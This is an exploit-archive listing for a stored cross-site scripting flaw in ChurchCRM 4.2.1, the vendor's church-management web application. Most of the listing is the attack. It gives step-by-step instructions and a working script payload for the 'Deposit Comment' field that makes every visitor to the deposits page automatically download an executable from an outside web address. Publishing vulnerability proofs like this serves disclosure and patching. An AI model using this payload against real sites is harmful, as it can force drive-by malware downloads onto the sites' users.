Churchcrm 4.2.1 persistent cross site scripting (xss) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2020-12-02 |
Type : webapps |
Platform : multiple
This exploit / vulnerability Churchcrm 4.2.1 persistent cross site scripting (xss) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
#Exploit Title: ChurchCRM 4.2.1- Persistent Cross Site Scripting(XSS)
#Date: 2020- 10- 29
#Exploit Author: Mufaddal Masalawala
#Vendor Homepage: https://churchcrm.io/
#Software Link: https://github.com/ChurchCRM/CRM
#Version: 4.2.1
#Tested on: Kali Linux 2020.3
#Proof Of Concept:
ChurchCRM application allows stored XSS , via 'Add new Deposit' module, that is rendered upon 'View All Deposits' page visit. There are multiple locations where this can be replicated To exploit this vulnerability:
1. Login to the application, go to 'View all Deposits' module.
2. Add the payload ( <script>var link = document.createElement('a');
link.href = 'http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe';
link.download = ''; document.body.appendChild(link); link.click();
</script>
) in the 'Deposit Comment' field and click "Add New Deposit".
3. Payload is executed and a .exe file is downloaded.
Churchcrm 4.2.1 persistent cross site scripting (xss)